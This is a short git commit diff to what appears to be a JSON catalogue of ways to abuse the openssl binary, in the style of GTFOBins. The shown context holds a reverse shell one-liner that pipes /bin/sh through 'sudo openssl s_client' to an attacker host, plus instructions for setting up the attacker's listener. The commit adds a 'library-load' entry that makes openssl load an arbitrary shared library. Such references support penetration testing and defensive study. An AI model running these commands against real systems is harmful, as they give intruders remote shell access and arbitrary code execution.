add library load function

master
t0thkr1s 4 years ago
parent 1cc70086c2
commit 15aa30f9e2

@ -45,6 +45,11 @@
"description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
"code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
}
],
"library-load": [
{
"code": "openssl req -engine ./lib.so"
}
]
}
}
Loading…
Cancel
Save